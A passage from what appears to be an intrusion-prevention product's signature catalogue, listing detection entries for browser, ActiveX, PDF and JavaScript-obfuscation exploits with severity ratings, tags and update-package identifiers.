First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-417-4219
Vulnerability: Internet-Explorer-Scroll-Event-Remote-Code-Execution
Description:
Back to top

HTTP_SS-Internet-Explorer-toStaticHTML-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-10, CVE2011, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Internet-Explorer-toStaticHTML-Cross-Site-Scripting
Description:
Back to top

HTTP_SS-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2557

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-08, CVE2010, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-330-4219
Last changed: sgpkg-ips-330-4219
Vulnerability: Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2557
Description:
Back to top

HTTP_SS-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2559

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-08, CVE2010, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-330-4219
Last changed: sgpkg-ips-330-4219
Vulnerability: Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2559
Description:
Back to top

HTTP_SS-Internet-Explorer-Urlmon.dll-Com-Object-Instantiation-Memory-Corruption

About this situation: Malicious usage of COM objects that are not implemented as ActiveX controls detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2007-06, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Internet-Explorer-Urlmon.dll-Com-Object-Instantiation-Memory-Corruption
Description:
Back to top

HTTP_SS-Iseemedia-LPViewer-ActiveX-Control-Multiple-Methods-Buffer-Overflow

About this situation: An attempt to exploit buffer overflow vulnerability in iseemedia LPViewer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, iseemedia LPViewer, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-175-2032
Last changed: sgpkg-ips-342-4219
Vulnerability: Iseemedia-LPViewer-ActiveX-Control-Multiple-Buffer-Overflows
Description:
Back to top

HTTP_SS-ISO-MPEG-4-Download

About this situation: Detected a download of MPEG-4 media file
Context: HTTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Streaming Protocols, TCP Server Traffic
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-173-2032
Vulnerability: ISO-MPEG-4-Media-Content
File-Type-Identification
Description:
Back to top

HTTP_SS-Java-Unsigned-Applet-Execution

About this situation: An attempt to exploit a vulnerability in Java Runtime Environment detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Java-Unsigned-Applet-Execution
Description:
Back to top

HTTP_SS-JavaScript-Dual-Custom-Function-Obfuscation-Method

About this situation: Detected an obfuscated script
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

HTTP_SS-JavaScript-Escaped-Obfuscation-Method

About this situation: Detected an obfuscated script
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-377-4219
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

HTTP_SS-JavaScript-In-PDF

About this situation: Javascript In PDF
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-208-2032
Last changed: sgpkg-ips-312-4219
Vulnerability: JavaScript-In-PDF
Description:
Back to top

HTTP_SS-JavaScript-Packed-Obfuscation-Method

About this situation: Detected an obfuscated script
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-195-2032
Last changed: sgpkg-ips-195-2032
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

HTTP_SS-JavaScript-Self-Reference

About this situation: Detected a script with a self reference
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Script-Self-Reference
Description:
Back to top

HTTP_SS-JavaScript-ShellCode-Generation

About this situation: Suspicious JavaScript code detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-107-2032
Last changed: sgpkg-ips-342-4219
Vulnerability: JavaScript-ShellCode-Generation
Description:
Back to top

HTTP_SS-JavaScript-ShellCode-Generation-2

About this situation: Suspicious JavaScript code detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-342-4219
Vulnerability: JavaScript-ShellCode-Generation
Description:
Back to top

HTTP_SS-JavaScript-ShellCode-Generation-3

About this situation: Suspicious JavaScript code detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-149-2032
Last changed: sgpkg-ips-368-4219
Vulnerability: JavaScript-ShellCode-Generation
Description:
Back to top

HTTP_SS-JavaScript-ShellCode-Generation-4

About this situation: Suspicious JavaScript code detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: JavaScript-ShellCode-Generation
Description:
Back to top

HTTP_SS-JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation

About this situation: An attempt to exploit a vulnerability in Adobe Systems Shockwave Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation
Description:
Back to top

HTTP_SS-JavaScript-Unescape-Obfuscation-Method

About this situation: Detected an obfuscated script
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

HTTP_SS-JavaScript-Unescape-Obfuscation-Method-2

About this situation: Detected an obfuscated script
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

HTTP_SS-JavaScript-With-Open-Action-In-PDF

About this situation: Automatically runnable JavaScript in PDF file
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-225-3038
Last changed: sgpkg-ips-371-4219
Vulnerability: JavaScript-In-PDF
Description:
Back to top

HTTP_SS-JavaScript-Xor-Obfuscation-Method

About this situation: Detected an obfuscated script
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-158-2032
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

HTTP_SS-JavaScript-Xor-One-Time-Pad-Obfuscation-Method

About this situation: Detected an obfuscated script
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-370-4219
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

HTTP_SS-Juniper-SSL-VPN-Client-Setup-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Juniper SSL-VPN Client Setup ActiveX control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Juniper Networks SSL-VPN Client, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-354-4219
Vulnerability: Juniper-SSL-VPN-Client-Setup-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Launch-Command-In-PDF

About this situation: Launch command in PDF
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-299-4219
Last changed: sgpkg-ips-302-4219
Vulnerability: Launch-Command-In-PDF
Description:
Back to top

HTTP_SS-Leadtools-Raster-Twain-Ltocxtwainu-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in LEAD Technologies LEADTOOLS Raster Twain detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, LEAD Technologies LEADTOOLS Raster Twain, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-373-4219
Vulnerability: Leadtools-Raster-Twain-Ltocxtwainu-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Libpng-PNG-Image-BOF

About this situation: Buffer overflow in Libpng
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2005-02, CVE2004, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-158-2032
Vulnerability: Libpng-Library-tRNS-sBIT-hIST-Chunk-Handling-BOF
Description:
Back to top

HTTP_SS-Libsndfile-PAF-File-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in the libsndfile library detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libsndfile, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Libsndfile-PAF-File-Integer-Overflow
Description:
Back to top

HTTP_SS-Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in XMLSoft Libxml2 detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Libxml2, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Multiple-Products-Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow
Description:
Back to top

HTTP_SS-LinkedIn-Internet-Explorer-Toolbar-IEContextMenu-ActiveX-Control-BOF

About this situation: Buffer overflow exploit against LinkedIn Internet Explorer Toolbar detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, LinkedIn Internet Explorer Toolbar, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: LinkedIn-Internet-Explorer-Toolbar-IEContextMenu-ActiveX-Control-BOF
Description:
Back to top

HTTP_SS-Liquid-XML-Studio-LtXmlComHelp8.dll-ActiveX-OpenFile-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Liquid XML Studio software detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Liquid Technologies XML Studio, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-297-4219
Last changed: sgpkg-ips-297-4219
Vulnerability: Liquid-XML-Studio-LtXmlComHelp8.dll-ActiveX-OpenFile-Buffer-Overflow
Description:
Back to top

HTTP_SS-Logitech-VideoCall-WebCamXMP-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Logitech VideoCall ActiveX control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Logitech VideoCall, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-262-3038
Vulnerability: Logitech-VideoCall-WebCamXMP-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Lotus-Domino-Web-Access-ActiveX-Control-Server-Name-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Domino was detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Lotus Domino, Windows not specific, Lotus Domino not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-291-4219
Last changed: sgpkg-ips-354-4219
Vulnerability: Lotus-Domino-Web-Access-ActiveX-Control-Server-Name-Buffer-Overflow
Description:
Back to top

HTTP_SS-Lupper-Worm-Download

About this situation: Lupper worm download
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, CVE2005, Any Operating System not specific, Successful Attacks, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-170-2032
Last changed: sgpkg-ips-170-2032
Vulnerability: HTTP-Awstats-Configdir-Parameter-System-Compromise
Description:
Back to top

HTTP_SS-Macromedia-Shockwave-mwdir.dll-ActiveX-Control-Buffer-Overflow

About this situation: Detected an access to vulnerabile methods of Macromedia Shockwave ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Macromedia Shockwave, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Macromedia-Shockwave-mwdir.dll-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Macrovision-InstallShield-Update-Service-ActiveX-Code-Execution

About this situation: An attempt to exploit a vulnerability in Macrovision Update Service detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Macrovision Update Service, Macrovision InstallShield, Macrovision FLEXnet Connect, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-129-2032
Last changed: sgpkg-ips-262-3038
Vulnerability: Macrovision-InstallShield-Update-Service-ActiveX-Code-Execution
Description:
Back to top

HTTP_SS-Macrovision-InstallShield-Update-Service-Agent-ActiveX-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Macrovision InstallShield Update Service detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Macrovision Update Service, Macrovision InstallShield, Macrovision FLEXnet Connect, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-175-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Macrovision-InstallShield-Update-Service-Agent-ActiveX-Memory-Corruption
Description:
Back to top

HTTP_SS-Malicious-BMP-File-CVE-2009-2518

About this situation: A malicious BMP file targeting CVE-2009-2518 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, MS2009-10, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-259-3038
Vulnerability: Office-BMP-Integer-Overflow-CVE-2009-2518
Description:
Back to top

HTTP_SS-Malicious-Java-Applet-Reference

About this situation: A reference to a malicious Java Applet detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-192-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Malicious-Java-Applet-Reference
Description:
Back to top

HTTP_SS-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-VerifyPackageCatalog-BOF

About this situation: Buffer overflow exploit against the McAfee SiteManager.DLL ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, McAfee ProtectionPilot, McAfee ePolicy Orchestrator, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-101-1314
Last changed: sgpkg-ips-342-4219
Vulnerability: HTTP-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-VerifyPackageCatalog-BOF
Description:
Back to top

HTTP_SS-McAfee-NeoTrace-ActiveX-Control-TraceTarget-Method-Buffer-Overflow

About this situation: Detected attempt to use vulnerable method of sasatl ActiveX component of Zenturi ProgramChecker
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, McAfee NeoTrace, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-262-3038
Vulnerability: McAfee-NeoTrace-ActiveX-Control-TraceTarget-Method-Buffer-Overflow
Description:
Back to top

HTTP_SS-Metasploit-JavaScript-Encryption

About this situation: An HTML obfuscation method used by Metasploit detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Metasploit-JavaScript-Encryption
Description:
Back to top

HTTP_SS-Metasploit-JavaScript-Escape-Evasion

About this situation: An HTML evasion method used by Metasploit detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-399-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Metasploit-JavaScript-Escape-Evasion
Description:
Back to top

HTTP_SS-MGI-LPViewer-LPControl-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MGI Systems LPViewer ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, iseemedia LPViewer, MGI Systems LPViewer, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-262-3038
Vulnerability: MGI-LPViewer-LPControl-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Code-Execution

About this situation: Attempt to exploit a code execution vulnerability in Microsoft Access Snapshot Viewer detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Access Snapshot Viewer, MS2008-08, CVE2008, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-158-2032
Last changed: sgpkg-ips-342-4219
Vulnerability: HTTP-Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Access detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Office Access, MS2010-07, CVE2010, Windows not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Agent-Crafted-Url-Stack-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Microsoft Agent detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows 2000, Any Hardware, Microsoft Agent, MS2007-09, CVE2007, Windows 2000 not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-121-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP_Microsoft-Agent-Crafted-Url-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-ATL-COM-Initialization

About this situation: An attempt to exploit a vulnerability in Microsoft Active Template Library detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-234-3038
Last changed: sgpkg-ips-234-3038
Vulnerability: Microsoft-ATL-COM-Initialization
Description:
Back to top

HTTP_SS-Microsoft-ATL-Uninitialized-Object

About this situation: An attempt to exploit a vulnerability in Microsoft Active Template Library detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-234-3038
Last changed: sgpkg-ips-234-3038
Vulnerability: Microsoft-ATL-Uninitialized-Object
Description:
Back to top

HTTP_SS-Microsoft-Color-Management-System-Crafted-Path-Name-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-08, CVE2008, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Microsoft-Color-Management-System-Crafted-Path-Name-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Data-Analyzer-ActiveX-Control-Code-Execution-CVE-2010-0252

About this situation: An attempt to exploit a code execution vulnerability in the Microsoft Data Analyzer ActiveX Control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, MS2010-02, CVE2010, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-282-4219
Last changed: sgpkg-ips-282-4219
Vulnerability: Microsoft-Data-Analyzer-ActiveX-Control-Code-Execution-CVE-2010-0252
Description:
Back to top

HTTP_SS-Microsoft-DHTML-Editing-Component-ActiveX-Control-Remote-Execution

About this situation: An exploit against a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows 2003, Windows 2000 SP4, Windows XP SP2, Windows XP 64-bit SP2, Any Hardware, MS2009-09, CVE2009, Windows 2003 not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-242-3038
Last changed: sgpkg-ips-254-3038
Vulnerability: Microsoft-DHTML-Editing-Component-ActiveX-Control-Remote-Execution
Description:
Back to top

HTTP_SS-Microsoft-DirectShow-Audio-Decoder-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft DirectShow detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2010-04, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-300-4219
Last changed: sgpkg-ips-300-4219
Vulnerability: Microsoft-DirectShow-Audio-Decoder-Stack-Overflow
Description:
Back to top

HTTP_SS-Microsoft-DirectShow-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft DirectShow detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2010-02, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-283-4219
Last changed: sgpkg-ips-283-4219
Vulnerability: Microsoft-DirectShow-Heap-Overflow
Description:
Back to top

HTTP_SS-Microsoft-DirectShow-QuickTime-Movie-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft DirectX detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, DirectX, MS2009-07, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Microsoft-DirectShow-QuickTime-Movie-Parsing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-DirectShow-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft DirectShow detected
